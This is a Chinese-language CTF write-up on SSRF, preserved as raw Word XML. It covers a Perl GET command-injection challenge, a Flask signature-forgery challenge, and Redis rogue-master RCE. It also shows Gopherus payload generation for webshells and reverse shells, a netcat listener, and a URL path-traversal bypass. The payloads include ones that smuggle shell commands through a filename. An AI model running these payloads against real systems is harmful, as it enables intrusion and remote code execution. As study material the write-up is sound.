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SSRF小结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SSRF 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知识点:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers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perl中的GET函数底层即会调用open处理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（前提是要文档存在）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val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在a.pl文件写入以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7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505200" cy="8229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Perl a.pl 运行文件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7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169920" cy="5257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发现出现了命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7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 </w:t>
      </w:r>
      <w:r>
        <w:t>open函数支持file协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7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 </w:t>
      </w:r>
      <w:r>
        <w:t>pathinfo函数的参数差异</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>pathinfo() 返回一个关联数组包含有 path 的信息。 包括以下的数组元素：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[dirname] //路径名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[basename] //文件名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[extension] //扩展名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解题：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打开题目拿到源码：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abs>
                <w:tab w:val="left" w:pos="720"/>
              </w:tabs>
              <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1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t>&lt;?php</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    }</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    echo $_SERVER["REMOTE_ADDR"];</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    @mkdir($sandbox);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    @chdir($sandbox);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    $info = pathinfo($_GET["filename"]);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    $dir  = str_replace(".", "", basename($info["dirname"]));</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    @mkdir($dir);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    @chdir($dir);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    @file_put_contents(basename($info["basename"]), $data);</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>    highlight_file(__FILE__);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7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由源码可页面首先会输出当前用户的IP,再根据IP的md5加密生成目录，并切换到当前目录。然后再执行GET拼接的shell命令并将内容写入到可控的文件中。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由此我们就很清楚的了解整个题目的解题思路：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由输出IP进行拼接和md5处理得到文件的路径；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利用GET拼接shell命令执行命令；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将结果写入到filename创建的文件；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访问该文件；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7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求文件路径：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="83502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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1342390"/>
            <wp:effectExtent l="0" t="0" r="1460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leftChars="0" w:right="0" w:righ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GET拼接执行url传入的命令并写入a文件：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Paylad：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http://0dd4cb3f-7262-4f14-bda4-a5228ae8315c.node4.buuoj.cn:81/?url=/&amp;filename=a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="7"/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访问a文件：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="3491230"/>
            <wp:effectExtent l="0" t="0" r="4445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首先我们读取到了根目录的内容，发现有flag和readflag，很明显我们需要执行readflag来读取flag；而我们可以利用bash -c "cmd string"来执行命令执行readflag。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Paylad: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Theme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>http://0dd4cb3f-7262-4f14-bda4-a5228ae8315c.node4.buuoj.cn:81/?url=&amp;filename=bash -c /readflag|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve">  //先创建bash -c /readflag文件</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7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http://0dd4cb3f-7262-4f14-bda4-a5228ae8315c.node4.buuoj.cn:81/?url=file:bash -c /readflag|&amp;filename=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>123 //执行命令，写入123文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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访问123文件：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872490"/>
            <wp:effectExtent l="0" t="0" r="190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t>[De1CTF 2019]SSRF Me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这是一道python中的ssrf题目。题目给出了源码：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1143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审计下源码！python的flask框架，三个路由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index获取源码，geneSign调用了getSign方法生成 md5，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De1ta应该是关键的页面！可以看见获取了三个参数，其中两个是从cookie中获取的：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action = urllib.unquote(request.cookies.get("action"))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7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param = urllib.unquote(request.args.get("param", ""))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7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sign = urllib.unquote(request.cookies.get("sign"))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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当做参数传入到Task类中，并调用Task类中的Exec()方法，这应该是关键！！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分析下三个参数：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第一个参数action是传入read和scan的，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第二个参数看着应该是传入一个文件名，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第三个参数sign是一个md5值，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跟进Task中的Exec()方法，可以发现这里面还有个checkSign()，并且在这里面调用了getSign()方法，结果与sign进行比较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仔细看看getSign()方法，发现有个secert_key我们是未知的，他的目的应该是要我们读取flag.txt中的内容！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所以我们需要构造参数！第一个参数action应该包含read，，第二个param参数应该是文件名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最关键就是第三个参数，由于我们不知道secert_key的值，所以不能自己加密，考点应该在这里！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访问一下geneSign页面，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看了看，发现MD5中是字符拼接！！这样我们构造param参数为param=flag.txtread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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1703705"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样我们就得到了md5(secert_key+flag.txtscan)的值！！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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>传参给/De1ta，即可拿到flag。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339215"/>
            <wp:effectExtent l="0" t="0" r="4445" b="190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网鼎杯 SSRF ME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题目拿到源码：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&lt;?php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function check_inner_ip($url)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{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    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url);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    if (!$match_result)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    {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        die('url fomat error');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    }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    try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    {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        $url_parse=parse_url($url);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    }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    catch(Exception $e)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    {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        die('url fomat error');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        return false;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    }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    $hostname=$url_parse['host'];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    $ip=gethostbyname($hostname);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    $int_ip=ip2long($ip);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    return ip2long('127.0.0.0')&gt;&gt;24 == $int_ip&gt;&gt;24 || ip2long('10.0.0.0')&gt;&gt;24 == $int_ip&gt;&gt;24 || ip2long('172.16.0.0')&gt;&gt;20 == $int_ip&gt;&gt;20 || ip2long('192.168.0.0')&gt;&gt;16 == $int_ip&gt;&gt;16;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}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function safe_request_url($url)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{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    if (check_inner_ip($url))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    {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        echo $url.' is inner ip';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    }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    else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    {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        $ch = curl_init();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        curl_setopt($ch, CURLOPT_URL, $url);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        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);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        curl_setopt($ch, CURLOPT_HEADER, 0);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        $output = curl_exec($ch);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        $result_info = curl_getinfo($ch);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        if ($result_info['redirect_url'])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        {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            safe_request_url($result_info['redirect_url']);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        }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        curl_close($ch);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        var_dump($output);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    }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}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if(isset($_GET['url'])){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    $url = $_GET['url'];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    if(!empty($url)){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        safe_request_url($url);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    }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}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else{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    highlight_file(__FILE__);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}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// Please visit hint.php locally.</w:t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?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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代码审计知道，check_inner_ip函数判断其是否为合法内网ip,并使用http或gopher等协议，看到curl_exec也比较明确是ssrf了,代码最后提示要从本地端访问hint.php文件。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Payload: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?Url=http://0.0.0.0/hint.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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访问hint.php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822950" cy="1107440"/>
            <wp:effectExtent l="0" t="0" r="13970" b="508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看到有redispass is root字样知道redis密码为root,看WP知道这需要利用redis主从复制来做。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打开一个linux的靶机，利用github上的脚本：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"https://github.com/n0b0dyCN/redis-rogue-server"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https://github.com/n0b0dyCN/redis-rogue-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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"https://github.com/xmsec/redis-ssrf"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https://github.com/xmsec/redis-ssrf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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将其中ssrf-redis.py rogue-server.py和exp.so放在一个目录下，对ssrf-redis.py 中做如下修改：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="989330"/>
            <wp:effectExtent l="0" t="0" r="4445" b="127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223645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4892040" cy="1249680"/>
            <wp:effectExtent l="0" t="0" r="0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将对应的地方都改为linux靶机的IP，端口以及需要执行的命令。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both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之后运行</w:t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"/>
        </w:rPr>
        <w:t xml:space="preserve">ssrf-redis.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>生成url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both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="803275"/>
            <wp:effectExtent l="0" t="0" r="14605" b="444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运行rogue-server.py，用于伪装为主redis。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将payload进行一次URL编码再利用，即可执行exp.so，得到结果。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546735"/>
            <wp:effectExtent l="0" t="0" r="4445" b="190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99110"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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工具使用：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gopherus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gopherus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是一款很强大得工具能够对多种ssrf类型的题目加以利用，生成对应的payload。这里以redis为例简单介绍以下其使用：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在CTF题目中如果找到了内网的服务开了6379端口，一般来说就是Redis未授权访问漏洞，并且没有ban掉gopher://就可以利用工具生成payload来利用。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运行命令：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Gopherus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--exploit redis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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之后会提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gopherus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大致有两种利用方式，写入shell和反弹shell;我们选择phpshell即写入shell。确定默认的路径并写入自己想要的php语句。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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3904615" cy="2426335"/>
            <wp:effectExtent l="0" t="0" r="1206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我们将生成的payload再经过一次url编码后利用（如果在输入框就不用再次编码）。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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="988695"/>
            <wp:effectExtent l="0" t="0" r="3175" b="19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上传成功，在目录下写入了shell.php文件。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640715"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1460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反弹shell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对于Redis服务一般还有通过写入定时任务来触发反弹shell的操作，可以使用上面的工具选择ReverseShell也可以一键生成payload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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3408680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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选择ReverseShell，然后写入你要反弹到的VPS的地址，因为这里监听端口工具写好是1234了，所以我们直接在VPS监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc -lvp 1234</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>即可。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此外，gopherus工具还可以利用mysql、fastcgi等。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补充：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>不存在协议头绕过：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b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kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>有关file_get_contents()函数的一个绕过方法，就是当PHP的 file_get_contents() 函数在遇到不认识的伪协议头时候会将伪协议头当做文件夹，造成目录穿越漏洞，这时候只需不断往上跳转目录即可读到根目录的文件。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例题：ctfshow-月饼杯_故人心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4310" cy="3318510"/>
            <wp:effectExtent l="0" t="0" r="13970" b="381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首先对于a\b\c的绕过不过多讲述，a可以用科学计数法构造很小的数绕过，b，c利用碰撞绕过。主要在于url的绕过。前两个绕过后，得到hint.php的内容：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482215" cy="620395"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445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php源码中，在向目标请求时先会判断使用的协议。如果协议无法识别，就会认为它是个目录。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FILTER_VALIDATE_URL 过滤器把值作为 URL 来验证。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题目中要求url中存在 ctfshow.com,又要构造符合url格式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我们可以构造类似 httpssss://ctfshow.com/../../../ 这样的url，又因为我们需要查看fl0g.txt文件最终payload为 url=httpssss://ctfshow.com/../../../../../fl0g.txt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572000" cy="1327785"/>
            <wp:effectExtent l="0" t="0" r="0" b="13335"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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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BDF256C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BBDF256C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3F8399FA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3F8399FA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7438B7C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7438B7C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7E71CC"/>
    <w:rsid w:val="016C0228"/>
    <w:rsid w:val="08744FED"/>
    <w:rsid w:val="0AB811F0"/>
    <w:rsid w:val="0BF32128"/>
    <w:rsid w:val="10177E69"/>
    <w:rsid w:val="13D04B4B"/>
    <w:rsid w:val="1675707E"/>
    <w:rsid w:val="227E71CC"/>
    <w:rsid w:val="27203C65"/>
    <w:rsid w:val="32EE015E"/>
    <w:rsid w:val="34E920FD"/>
    <w:rsid w:val="371A4AB8"/>
    <w:rsid w:val="3AC15A2F"/>
    <w:rsid w:val="3BB6596F"/>
    <w:rsid w:val="48254EB2"/>
    <w:rsid w:val="518E4C63"/>
    <w:rsid w:val="55E0038E"/>
    <w:rsid w:val="61253551"/>
    <w:rsid w:val="62A65B2E"/>
    <w:rsid w:val="63A94DED"/>
    <w:rsid w:val="74DC6485"/>
    <w:rsid w:val="7E5A23EA"/>
    <w:rsid w:val="7EB11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rFonts w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:lang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qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="12">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="10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25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2021-09-16T03:14:00Z</dcterms:created>
  <dc:creator>Zoro</dc:creator>
  <cp:lastModifiedBy>Zoro</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-18T08:00:56Z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72D9289EA4524ED99E94C5666AE2AC2E</vt:lpwstr>
  </property>
</Properties>
</file>